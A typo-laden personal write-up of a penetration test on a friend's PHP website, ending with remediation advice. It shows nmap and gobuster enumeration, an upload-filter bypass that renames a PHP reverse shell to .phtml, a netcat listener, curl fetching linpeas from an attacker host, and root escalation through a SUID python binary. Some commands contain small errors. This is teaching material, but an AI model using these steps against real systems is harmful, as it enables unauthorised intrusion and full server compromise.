From python with love

As a Unix/Linux specialist I’ve seen my fer share of misconfigurations and sometimes realy stupid way to get things doen. From python with love is one of those ‘'’real stories’’’ I will never forget. And it al begins on a cold authum day in 2020.

A firend of my is a PHP developer and was working on a site for his customer. And he called me to ask me to test the website. he asked me to see if there is a way to hack the site. I’m not a php developer but I know the way in php and I also know it’s shotycomes and possible way’s to hack it.

Hettiing the information

The first step is alway gather your information. My friend provided me with an IP-address amd a hostname, because the server and website desn’t have a fully qualified domain name. But for security purposes I will use the IP-addres: 172.16.0.100.

Getting the open ports

I know I’m going to test a website so I expect that the default ports for http port 80 and https port 443 are open, but now days ngonx is used a lot and it uses php-fpm with fast_cgi on a sepperat port. For this reason we are going to scan the server with nmap

# let's create a clean working directoy
mkdir -p pentest/logs
cd pentent

# running a default nmap scan on the target system
#
# -sC use nmap scripts (default/save)
# -sV getting versions of services
# -oN logs/initial-nmap.log logging out to file
export ip=172.16.0100
nmap =sC -sV -ov logs/initial-nmap.log ${ip}

Nmap scan report for 172.16.0.100
Host is up (0.031s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 4a:b9:16:08:84:c2:54:48:ba:5c:fd:3f:22:5f:22:14 (RSA)
|   256 a9:a6:86:e8:ec:96:c3:f0:03:cd:16:d5:49:73:d0:82 (ECDSA)
|_  256 22:f6:b5:a6:54:d9:78:7c:26:03:5a:95:f3:f9:df:cd (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: HackIT - Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Oct 21 12:35:27 2020 -- 1 IP address (1 host up) scanned in 8.50 seconds

Getting the webserver directory’s

hmmm, looks like there is no https/ssl configured. The configuration of ssl is not difficult but this is a point that needs to be addressed. But we carry ono. Apache is running on port 80 and there is there is php session created. Also port 22 is open. Port 22 is used by ssh and is a secure (remote) shell. Lets run some enumiration on the webserver and see of there are some dicertoy’s to us or exploit.

# using gobuster to enummerate the directory structure of the website
# the wordlist is a default wordlist in kali linux
gobuster dir -u "http://${ip}" -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt | tee logs/gobuster.log


===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://172.16.0.100
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/10/21 13:01:56 Starting gobuster
===============================================================
/uploads (Status: 301)
/css (Status: 301)
/js (Status: 301)
/panel (Status: 301)
/server-status (Status: 403)

Attack vector: php upload page

Most of the directory’s are as expected nut /panel is getting some of my attention. For security and privacy reason I can’t show you the page but it is a simple php upload page. This could pottentional be a attck vector.

Getting a reverse shell

Lets see if the upload page is configured well so it will not acept default scripting languages like php of something like that. After downloading teh php reverse shell it try to upload this file.

Well donem the extention .php is not allowed to upload. This could be done in the code by checking the extention, but the site could also check te header of the file.

# rename the reverse shell and give it another extention
mv php-reverse-shell.ph pphp-reverse-shell.phtml

The extention phtml is a lesser wellknown extention for php. Lets try to upload this. Toucje, the extention .phtml is allowed.

Local system shell

After uploading the php-reverse-shell.phtml we can access the php code in http://172.16.0.100/uploads/php-reverse-shell.phtml . Before we activate the reverse shell, we need to to setup a listener on our system.

# using netcat to create a default listener
nc -lnvp 9999
$

# yep we've got a shell, now we need to stablize it
python -c "import pty; pty.spawn('/bin/bash')"

# press ctrl + z to stop the process for extra stablization
stty raw -echo
fg
www-data@host ~$ ecport TERM=xterm
www-data@host ~$

From python with love

Now we have a stable reverse / remote shell to the and we can try to escalete the privileges of the user www-data. The user www-data is a system account of the webserver apache a should not have lot of permissions on the server

Enumerating the system

To find possible attack vectors w can use linpeas to search for possible exploits. But www-data and the reverse shell are does not have download functionality. But python could be used because the shell we created, was created with python

# running python simple http server on local host
python -m SimpleHttpServer 8000

# in reverse shell gettnig linpeas
# we are hiding in a directory /dev/shm because we have write permissions
curl http://kali.brakkedoos.nl:8000/linpeas.sh > /dev/shm/linpeas.sh
cd /dev/shm

# changing persission on linpeas.sh so we can execute it
chmod +x linpeas.sh

# running linpeas.sh to find exploits
./linpeas.sh | tee linpeas.log

# creating a python simple http server to copy ot our system
python -m SimpleHttpServer 8080

# on local system
curl http://172.16.0.100/linpeas.log

the SUID bit

After examination of the linpeas log i found that there is a program with a siud bit. The suid bit on linux will run a command with the privileges of the owner of the program. In this case /usr/bin/python has a suid bit and /usr/bin/python is from the user root. we allready have seen that python can spawn a shell. But this is done in an other way then we’ve doen.

# using python to drop a root shell
./python -c 'import os; os.execl("/bin/bash", "bash", "-p")'
bash4.1 ~#

# there we have the root shell and the server is compromised.

Conclusion

PHP could be dangerous if you misconfigure or misuse it. By not checking the header when uploading but checking the extention you could possible create a place to upload exploitable scripts. Also the use of suid on programs that could spawn a shell is a big thing. there are programs that needs the suid bit like passwd or su but this is done while installing the system.

The reason why python as a suid bit is not known by me, but is not normaly done. And as shown it is dangerous.

I reported my findings and reconfigured te server so this issue is resolved. My friend updated the code and upload file are now checked on it’s headers. While this could potentional also be exploited, it is a save way to do when upload functionality is required. But the best way is to configure php so that it could not run scripts.